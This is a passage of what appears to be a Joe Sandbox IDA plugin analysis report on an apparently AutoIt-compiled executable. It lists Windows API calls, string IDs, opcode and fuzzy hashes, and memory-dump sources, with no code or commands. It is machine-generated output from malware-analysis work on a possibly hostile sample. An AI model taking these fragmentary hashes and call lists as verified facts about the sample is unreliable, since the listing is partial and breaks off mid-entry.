                            • API String ID: 2267087916-0
                            • Opcode ID: d0d2884154f56982c90da320f394e5391b6f1564753a9cf45d597d127ad6f387
                            • Instruction ID: 2d98397f7589b25251fad1132612ad25eb84ca697f0047046b68d037855129ff
                            • Opcode Fuzzy Hash: d0d2884154f56982c90da320f394e5391b6f1564753a9cf45d597d127ad6f387
                            • Instruction Fuzzy Hash: FC21A3745083129F8700DF28C8818AABBE6EF56364F144A2DF4D9C72A2D731DE49CB72
                            APIs
                            • _free.LIBCMT ref: 00D75101
                              • Part of subcall function 00D6571C: __FF_MSGBANNER.LIBCMT ref: 00D65733
                              • Part of subcall function 00D6571C: __NMSG_WRITE.LIBCMT ref: 00D6573A
                              • Part of subcall function 00D6571C: RtlAllocateHeap.NTDLL(00900000,00000000,00000001,00000000,?,?,?,00D60DD3,?), ref: 00D6575F
                            Similarity
                            • API ID: AllocateHeap_free
                            • String ID:
                            • API String ID: 614378929-0
                            • Opcode ID: b1202aee6aab6b4f6852fc9b86e375710b727c96e5e12a957aa6134772299f67
                            • Instruction ID: 7f6862e1aa25d1212b0478f27e2e59617508d913c2ceac8a7deba9477661aa33
                            • Opcode Fuzzy Hash: b1202aee6aab6b4f6852fc9b86e375710b727c96e5e12a957aa6134772299f67
                            • Instruction Fuzzy Hash: 2011E372500B16AFCB313F74BC06B6D3B98DB00362B548629FD4D96254EEB0C94097B1
                            APIs
                            • _memset.LIBCMT ref: 00D444CF
                              • Part of subcall function 00D4407C: _memset.LIBCMT ref: 00D440FC
                              • Part of subcall function 00D4407C: _wcscpy.LIBCMT ref: 00D44150
                              • Part of subcall function 00D4407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00D44160
                            • KillTimer.USER32 ref: 00D44524
                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00D44533
                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00D7D4B9
                            Similarity
                            • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                            • String ID:
                            • API String ID: 1378193009-0
                            • Opcode ID: 5b83b62c2e14977a40457bc652bf319ce21be5f43b13b402856ff5d16a6634f9
                            • Instruction ID: 9dc0b19f12ad459d48611298cb60136469b923021db10a9b9a4ae10e0a930029
                            • Opcode Fuzzy Hash: 5b83b62c2e14977a40457bc652bf319ce21be5f43b13b402856ff5d16a6634f9
                            • Instruction Fuzzy Hash: C92107705047849FEB328B24D855BE7BBFDAF01318F08449DE6CE96281D37469C4CB61
                            APIs
                              • Part of subcall function 00D45A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00DA7896,?,?,00000000), ref: 00D45A2C
                              • Part of subcall function 00D45A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00DA7896,?,?,00000000,?,?), ref: 00D45A50
                            • gethostbyname.WSOCK32(?,?,?), ref: 00DB6399
                            • WSAGetLastError.WSOCK32(00000000), ref: 00DB63A4
                            • _memmove.LIBCMT ref: 00DB63D1
                            • inet_ntoa.WSOCK32(?), ref: 00DB63DC
                            Similarity
                            • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                            • String ID:
                            • API String ID: 1504782959-0
                            • Opcode ID: eae2456c0201ca6b64c877b5ea1d0ccdb136244a7b3984ff6b9f92f5ded7814a
                            • Instruction ID: 2248907b791fda01d03d08907f2310e1af3d408f6acb4da4f5452124b16f06c2
                            • Opcode Fuzzy Hash: eae2456c0201ca6b64c877b5ea1d0ccdb136244a7b3984ff6b9f92f5ded7814a
                            • Instruction Fuzzy Hash: BC11497650010AAFCB00EBA4D996CEEBBB9EF08310B144165F506A7262DB31EE14DB71
                            APIs
                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00D98B61
                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00D98B73
                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00D98B89
                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00D98BA4
                            Similarity
                            • API ID: MessageSend
                            • String ID:
                            • API String ID: 3850602802-0
                            • Opcode ID: d19f8a5f954c40b05e154aad95aade37b9136262fe381e62a9584a6b28b97f83
                            • Instruction ID: 852432c5282208af8be47eca7a389da9e24ab51e2ea63076e23bee2f3dd684d3
                            • Opcode Fuzzy Hash: d19f8a5f954c40b05e154aad95aade37b9136262fe381e62a9584a6b28b97f83
                            • Instruction Fuzzy Hash: 0F113A79900218BFDF10DB95C884E9DBBB4EB48710F244095E900B7250DA716E10EBA4
                            APIs
                              • Part of subcall function 00D42612: GetWindowLongW.USER32(?,000000EB), ref: 00D42623
                            • DefDlgProcW.USER32(?,00000020,?), ref: 00D412D8
                            • GetClientRect.USER32(?,?,?,?,?), ref: 00D7B5FB
                            • GetCursorPos.USER32(?), ref: 00D7B605
                            • ScreenToClient.USER32(?,?), ref: 00D7B610
                            Similarity
                            • API ID: Client$CursorLongProcRectScreenWindow
                            • String ID:
                            • API String ID: 4127811313-0
                            • Opcode ID: f51cc58d441b01823d9d1cf582a8f0f02a739d2fc8dffc1f3ad12cc8ad471838
                            • Instruction ID: a476ab7ab8c8811fc9f5f12002786d91eb7a03d9e94bf932ca821e00f562a0ff
                            • Opcode Fuzzy Hash: f51cc58d441b01823d9d1cf582a8f0f02a739d2fc8dffc1f3ad12cc8ad471838
                            • Instruction Fuzzy Hash: FB11283960011AAFCB00DF98D88ADFE77B9FB05300F404456FA41E7240D770AA918BB9
                            APIs
                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00D9FCED,?,00DA0D40,?,00008000), ref: 00DA115F
                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00D9FCED,?,00DA0D40,?,00008000), ref: 00DA1184
                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00D9FCED,?,00DA0D40,?,00008000), ref: 00DA118E
                            • Sleep.KERNEL32(?,?,?,?,?,?,?,00D9FCED,?,00DA0D40,?,00008000), ref: 00DA11C1
                            Similarity
                            • API ID: CounterPerformanceQuerySleep
                            • String ID:
                            • API String ID: 2875609808-0
                            • Opcode ID: 3c237dbf3b37a18977ee742853fec43a711d0cc7b20f022d747cb1bca7cf7f27
                            • Instruction ID: c1c3e8662a753e562437f59e37f8d5a422a64b342d5faa18c978faba39af8765
                            • Opcode Fuzzy Hash: 3c237dbf3b37a18977ee742853fec43a711d0cc7b20f022d747cb1bca7cf7f27
                            • Instruction Fuzzy Hash: C4113C39D0071EDBCF009FA5D848AEEBBB8FF1A711F054056EA85B2240CB709550CBB5
                            APIs
                            • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00D9D84D
                            • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00D9D864
                            • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00D9D879
                            • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00D9D897
                            Similarity
                            • API ID: Type$Register$FileLoadModuleNameUser
                            • String ID:
                            • API String ID: 1352324309-0
                            • Opcode ID: d213675190ac33364247ba28972663238871ca6049081c9234e8d7c79e6bfcb1
                            • Instruction ID: 8e7b51579ee5faa8c7ac8f7ecd913107c8ad1292e396d1e5d001f2741fc46344
                            • Opcode Fuzzy Hash: d213675190ac33364247ba28972663238871ca6049081c9234e8d7c79e6bfcb1
                            • Instruction Fuzzy Hash: 74116175605305EBEB209FA0DC09F93BBBDEB00B00F10856AA556D6151D7B0E549DBB1
                            APIs
                            Similarity
                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                            • String ID:
                            • API String ID: 3016257755-0
                            • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                            • Instruction ID: f33b509e0902d6e26b67e77777d37e7f37ec8a3e17ba37f0d0a43fab5f124556
                            • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                            • Instruction Fuzzy Hash: 0B014B7244814ABBCF265F84CC01CEE3F72FB18351B588825FA5C59031E236D9B1ABA1
                            APIs
                            • GetWindowRect.USER32(?,?), ref: 00DCB2E4
                            • ScreenToClient.USER32(?,?), ref: 00DCB2FC
                            • ScreenToClient.USER32(?,?), ref: 00DCB320
                            • InvalidateRect.USER32(?,?,?), ref: 00DCB33B
                            Similarity
                            • API ID: ClientRectScreen$InvalidateWindow
                            • String ID:
                            • API String ID: 357397906-0
                            • Opcode ID: 04ed4cdc5c8697f44ff50b5aef0bbaa9953e326e27d01bd88eaa295ecdc9aa07
                            • Instruction ID: b7b37bc7a3f06ac1e2f8ae286476babebba0806d6b0c0dce907189e17881b96d
                            • Opcode Fuzzy Hash: 04ed4cdc5c8697f44ff50b5aef0bbaa9953e326e27d01bd88eaa295ecdc9aa07
                            • Instruction Fuzzy Hash: C1114675D4024AEFDB41CF99C444AEEBBB5FB08310F104166E954E3320D735AA559F60
                            APIs
                            • EnterCriticalSection.KERNEL32(?), ref: 00DA6BE6
                              • Part of subcall function 00DA76C4: _memset.LIBCMT ref: 00DA76F9
                            • _memmove.LIBCMT ref: 00DA6C09
                            • _memset.LIBCMT ref: 00DA6C16
                            • LeaveCriticalSection.KERNEL32(?), ref: 00DA6C26
                            Similarity
                            • API ID: CriticalSection_memset$EnterLeave_memmove
                            • String ID:
                            • API String ID: 48991266-0
                            • Opcode ID: 74c89344c1faa1661293f26e79ddd37955000aee46e6874da3e1e6b98a4198ec
                            • Instruction ID: afe964941ac6b97398121b892e8610494a1ef2deb5dd8f4d4c0bcd586524f710
                            • Opcode Fuzzy Hash: 74c89344c1faa1661293f26e79ddd37955000aee46e6874da3e1e6b98a4198ec
                            • Instruction Fuzzy Hash: 19F0F47A100210ABCF416F95DC85E8ABF2AEF45361F048065FE089E267D735E911DBB4
                            APIs
                            • GetSysColor.USER32(00000008,00000000), ref: 00D42231
                            • SetTextColor.GDI32(?,000000FF), ref: 00D4223B
                            • SetBkMode.GDI32(?,00000001), ref: 00D42250
                            • GetStockObject.GDI32(00000005), ref: 00D42258
                            • GetWindowDC.USER32(?), ref: 00D7BE83
                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 00D7BE90
                            • GetPixel.GDI32(00000000,?,00000000), ref: 00D7BEA9
                            • GetPixel.GDI32(00000000,00000000,?), ref: 00D7BEC2
                            • GetPixel.GDI32(00000000,?,?), ref: 00D7BEE2
                            • ReleaseDC.USER32(?,00000000), ref: 00D7BEED
                            Similarity
                            • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                            • String ID:
                            • API String ID: 1946975507-0
                            • Opcode ID: cc9e1b5e9e6f6a39cbc877a09ff8161708d9f81c600ef7d1c21417833045695a
                            • Instruction ID: a0c3eb99d9059c59b50d90909c0578791303b3d7c59357b9eaef7e5aa1f81f51
                            • Opcode Fuzzy Hash: cc9e1b5e9e6f6a39cbc877a09ff8161708d9f81c600ef7d1c21417833045695a
                            • Instruction Fuzzy Hash: 3DE03932104346AADB215F64EC4DBD83B12EB05332F188366FAA9881E197B24980DB32
                            APIs
                            • GetCurrentThread.KERNEL32(00000028,00000000,?,00000000,00D98195,?,?,?,00D982E6), ref: 00D9871B
                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,00D982E6), ref: 00D98722
                            • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00D982E6), ref: 00D9872F
                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,00D982E6), ref: 00D98736
                            Similarity
                            • API ID: CurrentOpenProcessThreadToken
                            • String ID:
                            • API String ID: 3974789173-0
                            • Opcode ID: 9531a18a15b26f8c58ad025682468e9bf24de18c6433176f2aafefd99883e554
                            • Instruction ID: b6c3b4b238b2d716cebad5c4b170c39226c29ad46810f93afe5080cb88538407
                            • Opcode Fuzzy Hash: 9531a18a15b26f8c58ad025682468e9bf24de18c6433176f2aafefd99883e554
                            • Instruction Fuzzy Hash: 7AE08676611313ABDB205FF05D0CFD67BAEEF51B91F144828F645CA040DA348445D770
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: __itow_s
                            • String ID: xb$xb
                            • API String ID: 3653519197-3775679291
                            • Opcode ID: 56b2526e5c068124aa46b9a1a1dd4abd57234eddd838c174ec9b40c2296ada99
                            • Instruction ID: cf82e54c003c05e5e2b32a51f2db11f1cbeedc6062dc727cd1bff4819bae29db
                            • Opcode Fuzzy Hash: 56b2526e5c068124aa46b9a1a1dd4abd57234eddd838c174ec9b40c2296ada99
                            • Instruction Fuzzy Hash: C6B15D70A00209EFCB14DF59C891EFABBB9EF59350F14805AF9469B291EB71D981CB70
                            APIs
                            • OleSetContainedObject.OLE32(?,00000001), ref: 00D9B4BE
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ContainedObject
                            • String ID: AutoIt3GUI$Container
                            • API String ID: 3565006973-3941886329
                            • Opcode ID: 36bf185e4723873b583cc55b648032c766cae047e072c8d73e6ac1bf5ddd06bc
                            • Instruction ID: 78a7ee06f6238a1d06bffbb57a138b2080afcf0ef620db6e7561810da9b0f5d0
                            • Opcode Fuzzy Hash: 36bf185e4723873b583cc55b648032c766cae047e072c8d73e6ac1bf5ddd06bc
                            • Instruction Fuzzy Hash: 34916870200601EFDB54CF64D984AAABBE5FF48720F25856EF94ACB391DB70E841CB60
                            APIs
                              • Part of subcall function 00D5FC86: _wcscpy.LIBCMT ref: 00D5FCA9
                              • Part of subcall function 00D49837: __itow.LIBCMT ref: 00D49862
                              • Part of subcall function 00D49837: __swprintf.LIBCMT ref: 00D498AC
                            • __wcsnicmp.LIBCMT ref: 00DAB02D
                            • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00DAB0F6
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                            • String ID: LPT
                            • API String ID: 3222508074-1350329615
                            • Opcode ID: 6ee41dc0c3ec3ce0f1ab9bd3f71b5d6436ba520830d7894d398325ab8c5269c5
                            • Instruction ID: a84a09f2c0e2c7506565d52890782a0bb667d95ea195e02d0b4c6bcd8624af9a
                            • Opcode Fuzzy Hash: 6ee41dc0c3ec3ce0f1ab9bd3f71b5d6436ba520830d7894d398325ab8c5269c5
                            • Instruction Fuzzy Hash: 2861A571A00215AFCB14DF98C8A1EAEB7B4EF09320F04406AF956AB352D770EE45CB74
                            APIs
                            • Sleep.KERNEL32(00000000), ref: 00D52968
                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 00D52981
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: GlobalMemorySleepStatus
                            • String ID: @
                            • API String ID: 2783356886-2766056989
                            • Opcode ID: e35dc43122605f462b5c08a9123b42d317baa826d500f93136d5dd7a9d665538
                            • Instruction ID: d1dd7771f4100c122461e5a3446a5be210f25ec1fed357052e152501195aae37
                            • Opcode Fuzzy Hash: e35dc43122605f462b5c08a9123b42d317baa826d500f93136d5dd7a9d665538
                            • Instruction Fuzzy Hash: D45146724087449BD320EF15DC86BAFBBE8FB85344F42885DF6D8811A1DB318529CB76
                            APIs
                              • Part of subcall function 00D44F0B: __fread_nolock.LIBCMT ref: 00D44F29
                            • _wcscmp.LIBCMT ref: 00DA9824
                            • _wcscmp.LIBCMT ref: 00DA9837
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: _wcscmp$__fread_nolock
                            • String ID: FILE
                            • API String ID: 4029003684-3121273764
                            • Opcode ID: 1c7fb6be663a3d0372778a0b49756d12c444c8b9849104885aa283883ffdc476
                            • Instruction ID: e8e547bcc062906c539358c2aa670b968908a93d9fb16e93bf360c55d81d71f6
                            • Opcode Fuzzy Hash: 1c7fb6be663a3d0372778a0b49756d12c444c8b9849104885aa283883ffdc476
                            • Instruction Fuzzy Hash: C041A471A0021ABBDF219EA4CC55FEFBBBDDF86710F004469F904A7181DA75AA488B71
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ClearVariant
                            • String ID: Dd$Dd
                            • API String ID: 1473721057-2413357308
                            • Opcode ID: 0f70ad2cefc19ac77ef1777cd954f0afa8b41b6c2452c24ee17be66e709e7d95
                            • Instruction ID: 69b1219d61c6f1d27720e5044dbbf2d56f873996885dca1016a4dce879c292a5
                            • Opcode Fuzzy Hash: 0f70ad2cefc19ac77ef1777cd954f0afa8b41b6c2452c24ee17be66e709e7d95
                            • Instruction Fuzzy Hash: CA51E0786493428FD754CF19C480A1ABBF2FB99354F58885DE9858B361E332E885CF62
                            APIs
                            • _memset.LIBCMT ref: 00DB259E
                            • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00DB25D4
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: CrackInternet_memset
                            • String ID: |
                            • API String ID: 1413715105-2343686810
                            • Opcode ID: 044956fc568e0a5fe97948e8b695df093b7e9ae07265ac8f1128d646f45d6694
                            • Instruction ID: f510da7c2ecf7cb7023276113c44833c65deca9f7385687a5d4af95a9fed1421
                            • Opcode Fuzzy Hash: 044956fc568e0a5fe97948e8b695df093b7e9ae07265ac8f1128d646f45d6694
                            • Instruction Fuzzy Hash: 8531F571900119EBCF11AFA4CC85EEEBBB9FF08350F104059E915B6162EB319956DB70
                            APIs
                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00DC7B61
                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00DC7B76
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: MessageSend
                            • String ID: '
                            • API String ID: 3850602802-1997036262
                            • Opcode ID: 07ec1e5283556079cde57e6154a27a74f1921fa7c22d82f69afb4463e98f39a9
                            • Instruction ID: 2a4208c24d45981096ad3fb14c3fbc74c0e7d3353038625b7fd673609d1f7536
                            • Opcode Fuzzy Hash: 07ec1e5283556079cde57e6154a27a74f1921fa7c22d82f69afb4463e98f39a9
                            • Instruction Fuzzy Hash: FE41E775A0520A9FDB14CF65C981FEABBB9FB08300F14416AE908EB391D771A951CFA0
                            APIs
                            • DestroyWindow.USER32 ref: 00DC6B17
                            • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00DC6B53
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Window$DestroyMove
                            • String ID: static
                            • API String ID: 2139405536-2160076837
                            • Opcode ID: 7b942e465eab383f6688ac6e173a145f760f75a2a98afcb931e4f5ca5a231926
                            • Instruction ID: 7126c056dd6f44378c2dbe4a33a98e416b60ac502eb25b7a08ee345f48dcc863
                            • Opcode Fuzzy Hash: 7b942e465eab383f6688ac6e173a145f760f75a2a98afcb931e4f5ca5a231926
                            • Instruction Fuzzy Hash: 63316971200605AADB109F68C881FEB77A9FF48760F14861EF9A5D7190DA31EC81CB70
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: InfoItemMenu_memset
                            • String ID: 0
                            • API String ID: 2223754486-4108050209
                            • Opcode ID: ffd330f401e80fec220c3600bf1450d5a04ddf3c3b6e80df915eda35dfc12734
                            • Instruction ID: 381b87ae9925cd296a09eb87b960d5f2b4fb77faff0d2970a58f733dd8fa6f84
                            • Opcode Fuzzy Hash: ffd330f401e80fec220c3600bf1450d5a04ddf3c3b6e80df915eda35dfc12734
                            • Instruction Fuzzy Hash: 7031C1316403059BEB28CF5EC985BBFBBB8EF46750F180429ED85A61A1D7709944CF71
                            APIs
                            • __snwprintf.LIBCMT ref: 00DB3A66
                              • Part of subcall function 00D47DE1: _memmove.LIBCMT ref: 00D47E22
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: __snwprintf_memmove
                            • String ID: , $$AUTOITCALLVARIABLE%d
                            • API String ID: 3506404897-2584243854
                            • Opcode ID: d04f0522e554b8755139f4248bf6fd1c9fe8e6196593131c08eff903d9dec161
                            • Instruction ID: b87a7d929c53b1fa871f70594524ea654a45175af2751026aaa1b68edbb448d5
                            • Opcode Fuzzy Hash: d04f0522e554b8755139f4248bf6fd1c9fe8e6196593131c08eff903d9dec161
                            • Instruction Fuzzy Hash: 3F214D31A00219AFCF10EFA4CC82AEE77B9EF44700F614455F556AB282DB30EA45DB71
                            APIs
                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00DC6761
                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00DC676C
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: MessageSend
                            • String ID: Combobox
                            • API String ID: 3850602802-2096851135
                            • Opcode ID: 5e04cd9878e6efc9a33f1db79b0e1e4d05b05ab604881aef30413817b10ca252
                            • Instruction ID: ea67d9c3d37817b1eebebc7d5f0cff6d6d0279c5141833134b2c0f733098aa64
                            • Opcode Fuzzy Hash: 5e04cd9878e6efc9a33f1db79b0e1e4d05b05ab604881aef30413817b10ca252
                            • Instruction Fuzzy Hash: 5211827560020AAFEF119F54CC81FFB376AEB48368F154629F918972D0D671DC5197B0
                            APIs
                              • Part of subcall function 00D41D35: CreateWindowExW.USER32 ref: 00D41D73
